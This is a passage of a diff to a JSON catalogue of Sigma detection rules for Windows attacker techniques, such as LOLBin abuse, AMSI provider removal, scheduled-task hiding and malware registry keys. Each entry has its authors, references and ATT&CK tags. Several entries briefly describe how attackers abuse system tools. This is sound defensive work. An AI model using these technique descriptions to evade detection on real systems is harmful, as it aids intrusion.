the execution of rundll32 with a command line that doesn't contain a .dll file", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/18", + "author": "Tim Shelton, Florian Roth, Yassine Oukessou (fix + fp)", + "creation_date": "2022/01/13", "falsepositive": [ - "Legitimate usage of the file by hardware 
manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], - "filename": "proc_creation_win_wpbbin_persistence.yml", + "filename": "proc_creation_win_run_executable_invalid_extension.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + "https://twitter.com/mrd0x/status/1481630810495139841?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_executable_invalid_extension.yml" ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ] + "tags": "No established tags" }, - "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", - "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "value": "Rundll32 Execution Without DLL File" }, { - "description": "Looks for changes to registry to disable any write-protect property for storage devices. 
This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", "meta": { - "author": "Sreeman", - "creation_date": "2021/06/11", + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/02/21", + "falsepositive": [ + "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" + ], + "filename": "proc_creation_win_susp_codepage_lookup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1614.001" + ] + }, + "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", + "value": "CHCP CodePage Locale Lookup" + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. 
Add more LOLBins to rule logic if needed.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redmimicry_winnti_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" + ] + }, + "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "value": "RedMimicry Winnti Playbook Execute" + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": 
"frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1562.004" ] }, - "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "value": "Write Protect For Storage Disabled" + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" }, { - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/31", + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "creation_date": "2019/06/29", "falsepositive": [ - "Rare legitimate inline scripting by some administrators" + "Unknown how many legitimate software products use that method" ], - "filename": "proc_creation_win_wscript_shell_cli.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", - "value": "Wscript Shell Run In CommandLine" - }, - { - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wsudo_susp_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/M2Team/Privexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" - ] - }, - "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", - "value": "Wsudo Suspicious Execution" - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/04", - "falsepositive": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" - ], - "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "value": "Wusa Extracting Cab Files" - }, - { - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://www.echotrail.io/insights/search/wusa.exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "value": "Wusa Extracting Cab Files From Suspicious 
Paths" - }, - { - "description": "Detects suspicious use of XORDump process memory dumping utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/28", - "falsepositive": [ - "Another tool that uses the command line switches of XORdump" - ], - "filename": "proc_creation_win_xordump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/audibleblink/xordump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1036" ] }, - "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "value": "XORDump Use" + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break" + }, + { + "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th postiional argument", + "meta": { + "author": "Nasreddine Bencherchali, memory-shards", + "creation_date": "2022/12/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://twitter.com/lefterispan/status/1286259016436514816", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "value": "Suspicious AgentExecutor PowerShell Execution" }, { "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", 
@@ -58151,5111 +51731,13771 @@ "value": "XSL Script Processing" }, { - "description": "Raw disk access using illegitimate tools, possible defence evasion", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator using tool for raw access or ongoing forensic investigation" - ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", - "level": "low", - "logsource.category": "raw_access_thread", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1006" - ] - }, - "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", - "value": "Raw Disk Access Using Illegitimate Tools" - }, - { - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate security products adding their own AMSI providers" - ], - "filename": "registry_add_amsi_providers_persistence.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/amsi.html", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "value": "Persistence Via New AMSI Providers" - }, - { - "description": "Detects creation of UserInitMprLogonScript persistence method", - "meta": { - "author": "Tom Ueltschi 
(@c_APT_ure)", - "creation_date": "2019/01/12", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" - ] - }, - "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" - }, - { - "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", - "meta": { - "author": "Christopher Peacock", - "creation_date": "2021/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_mal_netwire.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", - "value": "NetWire RAT Registry Key" - }, - { - "description": "Detects new registry 
key created by Ursnif malware.", - "meta": { - "author": "megan201296", - "creation_date": "2019/02/13", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_mal_ursnif.yml", - "level": "high", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ] - }, - "uuid": "21f17060-b282-4249-ade0-589ea3591558", - "value": "Ursnif" - }, - { - "description": "Detects COM object hijacking via TreatAs subkey", - "meta": { - "author": "Kutepov Anton, oscd.community", - "creation_date": "2019/10/23", - "falsepositive": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" - ], - "filename": "registry_add_persistence_key_linking.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "value": "Windows Registry Persistence COM Key Linking" - }, - { - "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", - "level": "high", 
- "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", - "value": "Usage of Renamed Sysinternals Tools" - }, - { - "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Legitimate use of SysInternals tools" - ], - "filename": "registry_add_susp_sysinternals_eula_accepted.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "value": "Usage of Suspicious Sysinternals Tools" - }, - { - "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/08/28", - "falsepositive": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" - ], - "filename": "registry_add_sysinternals_eula_accepted.yml", - "level": "low", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Moti_B/status/1008587936735035392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - 
"attack.t1588.002" - ] - }, - "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", - "value": "Usage of Sysinternals Tools - Registry" - }, - { - "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", - "value": "Sysinternals SDelete Registry Keys" - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate new entry added by windows" - ], - "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", - "level": "medium", - "logsource.category": "registry_add", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", - "value": "Persistence Via Disk Cleanup Handler - NewEntry" - }, - { - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
Which could indicate an attacker trying to launch an encryption process", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legitimate administrators removing applications (should always be monitored)" - ], - "filename": "registry_delete_exploit_guard_protected_folders.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" - }, - { - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_mstsc_history_cleared.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", - "http://woshub.com/how-to-clear-rdp-connections-history/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" - ] - }, - "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "value": "Terminal Server Client Connection History Cleared" - }, - { - "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", - "meta": { - "author": "frack113", 
- "creation_date": "2021/06/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_delete_removal_amsi_registry_key.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://seclists.org/fulldisclosure/2020/Mar/45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", - "value": "Removal Of Amsi Provider Reg Key" - }, - { - "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Legitimate software (un)installations are known to cause some false positives. 
Please add them as a filter when encountered" - ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "value": "Removal of Potential COM Hijacking Registry Keys" - }, - { - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/26", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", - "value": "Removal Of Index Value to Hide Schedule Task" - }, - { - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "meta": { - "author": "Sittikorn S", - "creation_date": "2022/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", - "value": "Removal Of SD Value to Hide Schedule Task" - }, - { - "description": "Sysmon registry detection of a local hidden user account.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/05/03", - "falsepositive": [ - "Unknown" - ], - "filename": 
"registry_event_add_local_hidden_user.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1387530414185664538", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ] - }, - "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "value": "Creation of a Local Hidden User Account by Registry" - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_chafer_mar18.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "value": "Chafer Activity - Registry" - }, - { - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "meta": { - "author": "Aidan Bracher", - "creation_date": "2020/07/07", - "falsepositive": "No established falsepositives", - "filename": "registry_event_apt_leviathan.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "value": "Leviathan Registry Key Activity" - }, - { - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "meta": { - "author": "megan201296, Jonhnathan Ribeiro", - "creation_date": "2019/04/14", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_oceanlotus_registry.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", - "https://github.com/eset/malware-ioc/tree/master/oceanlotus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "value": "OceanLotus Registry Activity" - }, - { - "description": "Detects Pandemic Windows Implant", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_pandemic.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - 